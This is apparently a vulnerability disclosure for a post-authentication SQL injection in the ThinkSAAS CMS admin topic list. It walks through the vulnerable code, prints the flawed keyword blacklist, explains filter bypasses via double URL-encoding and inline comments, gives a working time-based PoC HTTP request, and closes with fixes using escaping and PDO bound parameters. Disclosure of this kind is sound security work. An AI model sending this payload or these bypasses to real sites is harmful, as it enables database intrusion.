
Thinksaas has a Post-Auth SQL injection vulnerability in app/topic/action/admin/topic.php

1. Intro

of this CMS

The repository of ThinkSAAS is at https://github.com/thinksaas/ThinkSAAS ; it is a fairly commonly used CMS.

The source code of v3.38 can be downloaded from https://www.thinksaas.cn/service/down/ ; the download passcode is thinksaas9999 .


of this Vuln

ThinkSAAS before 3.38 has SQL injection via the /index.php?app=topic&ac=admin&mg=topic&ts=list&title=PoC title parameter, allowing remote attackers to execute arbitrary SQL commands.

2. Walkthrough

Code Review

Risky lines are here =>

The root cause is (1) improper concatenation of SQL query strings and (2) an ineffective filter.

(1) improper concatenation of SQL query strings

app/topic/action/admin/topic.php#L42



Let's see how findAll() works:

thinksaas/tsApp.php#L146



At this point $where is partly attacker-controlled once a single quote ' is injected via $title, but how to close off the rest of the query string is still an open question, because # and -- are filtered.

However, the urldecode() call helps: a double-URL-encoded parameter such as %25%23 decodes to %23 and then to # (i.e. %2523 ends up as #), so it BYPASSES the filter on # as follows.

So we have a SQLi vulnerability. Let's look at the sanitizing functions.

(2) ineffective filter

This CMS has some global functions for sanitizing user-controlled parameters, in /thinksaas/tsFunction.php#2134 :

function tsFilter($value) {
    $value = trim($value);
    // Define the SQL commands and keywords that are not allowed to be submitted
    $words = array();
    $words[] = "add ";
    $words[] = "and ";
    $words[] = "count ";
    $words[] = "order ";
    $words[] = "table ";
    $words[] = "by ";
    $words[] = "create ";
    $words[] = "delete ";
    $words[] = "drop ";
    $words[] = "from ";
    $words[] = "grant ";
    $words[] = "insert ";
    $words[] = "select ";
    $words[] = "truncate ";
    $words[] = "update ";
    $words[] = "use ";
    $words[] = "--";
    $words[] = "#";
    $words[] = "group_concat";
    $words[] = "column_name";
    $words[] = "information_schema.columns";
    $words[] = "table_schema";
    $words[] = "union ";
    $words[] = "where ";
    $words[] = "alert";
    $value = strtolower($value);
    // Convert to lowercase
    foreach ($words as $word) {
        if (strstr($value, $word)) {
            $value = str_replace($word, '', $value);
        }
    }

    return $value;
}

Apart from the fact that the single-pass foreach ($words as $word) { loop cannot completely strip those words, the blacklist itself is ineffective: SELselect ECT 1 still works, since removing the inner select leaves SELECT 1 .

Also, one is able to use select/**/1 instead of select 1 to bypass the blacklisted word select .

Following the above, select/**/1/**/from/**/(sleep(1) could be used.

In summary, a crafted payload (double URL-encoding plus SQL injection) triggers the SQLi; of course, one needs to log in first...
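To make the two failure modes concrete, here is an added PHP example (not ThinkSAAS code) that runs an abbreviated copy of tsFilter() over the three inputs discussed above in both orders: filter-then-decode, as the application does, and decode-then-filter. The word list is cut down to the entries relevant here, tsFilterAbbrev() and compareOrderings() are names introduced for this example, and the sample values are constructed.

```php
<?php
// Added example, not part of ThinkSAAS. tsFilterAbbrev() is an abbreviated copy of
// tsFilter() from thinksaas/tsFunction.php, keeping only the words relevant here.
function tsFilterAbbrev(string $value): string
{
    $value = strtolower(trim($value));
    foreach (['select ', 'from ', '--', '#'] as $word) {
        // Single pass: whatever the removal leaves behind is never re-checked.
        $value = str_replace($word, '', $value);
    }
    return $value;
}

// Constructed samples. PHP has already decoded the query string once when it
// fills $_GET, so a doubly-encoded %2523 reaches the filter as %23.
$samples = [
    '%23'             => 'double-encoded comment marker, as the filter sees it',
    'selselect ect 1' => 'blacklisted word nested inside itself',
    'select/**/1'     => 'keyword followed by an inline comment instead of a space',
];

// Run each sample through both orderings and return what would reach the query.
function compareOrderings(array $samples): array
{
    $out = [];
    foreach ($samples as $input => $why) {
        $out[$input] = [
            'why'                => $why,
            'filter_then_decode' => urldecode(tsFilterAbbrev($input)), // the app's order
            'decode_then_filter' => tsFilterAbbrev(urldecode($input)), // corrected order
        ];
    }
    return $out;
}

foreach (compareOrderings($samples) as $input => $r) {
    printf("%-18s %s\n  filter->decode: %s\n  decode->filter: %s\n",
        $input, $r['why'], $r['filter_then_decode'], $r['decode_then_filter']);
}
```

Only the first case is cured by decoding before filtering: %23 becomes # and is stripped. The nested keyword comes out as a clean select 1 in both orderings and the comment-separated form passes untouched, which is why a keyword blacklist cannot be the defence and the fix has to sit at the query itself.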

PoC & EXPLOIT

GET /index.php?app=topic&ac=admin&mg=topic&ts=list&title=PoC%%2527+and/**/1-(select/**/1/**/from/**/(select+sleep(3))a)%2523%2520 HTTP/1.1

Host: thinksaas

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4230.1 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-SG,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Referer: http://thinksaas/index.php?app=search&ac=s&kw=keyword

Cookie: PHPSESSID=6im4ssqo33h8l2d43u78nbr4c3;  ts_autologin=goh59atl3dsk44o4sws48s80co44ww8

Upgrade-Insecure-Requests: 1

 


3. Mitigations

After urldecode(), parameter sanitizing is still necessary; a possible fix is as follows:

if ($title) {
    //$where = "`title` like '%$title%'";
    $where = "`title` like '%" . $this->escape($title) . "%'";
}
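Escaping closes the quote problem, but the cleaner fix is to stop building the WHERE clause by string concatenation at all. As an added example (not ThinkSAAS code), here is the title filter rewritten with a PDO bound parameter; the table and column names ts_topic and topicid, the helper names escapeLike() and findTopicsByTitle(), and the connection details are assumptions for illustration.

```php
<?php
// Added example, not ThinkSAAS code. Table/column names and DSN are assumptions.

// A bound parameter keeps the value out of the SQL text, but LIKE still treats
// % and _ as wildcards; escape them so a search for "100%" means exactly that.
function escapeLike(string $s, string $esc = '!'): string
{
    return str_replace([$esc, '%', '_'], [$esc . $esc, $esc . '%', $esc . '_'], $s);
}

function findTopicsByTitle(PDO $pdo, ?string $title): array
{
    $sql    = 'SELECT `topicid`, `title` FROM `ts_topic`';
    $params = [];
    if ($title !== null && $title !== '') {
        // The value travels as a parameter, never as part of the statement, so
        // quotes, # or -- inside it cannot change the query's structure.
        // No second urldecode(): PHP already decoded $_GET once.
        $sql .= ' WHERE `title` LIKE :pattern ESCAPE \'!\'';
        $params[':pattern'] = '%' . escapeLike($title) . '%';
    }
    $sql .= ' ORDER BY `topicid` DESC LIMIT 50';
    $stmt = $pdo->prepare($sql);
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$pdo = new PDO('mysql:host=127.0.0.1;dbname=thinksaas;charset=utf8mb4', 'user', 'pass', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // server-side prepares, not client-side quoting
]);
$rows = findTopicsByTitle($pdo, $_GET['title'] ?? null);
```

With emulated prepares disabled the MySQL server receives the statement and the value separately, so neither the blacklist in tsFilter() nor the decoding order matters for the query's safety; the ESCAPE clause only exists to keep LIKE wildcards in user input from being interpreted.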


Comments

  1. Hello, is this with the system administrator logged in?

    1. Yes, it is with the system administrator logged in. Yes, it's a Post-Auth SQL Injection
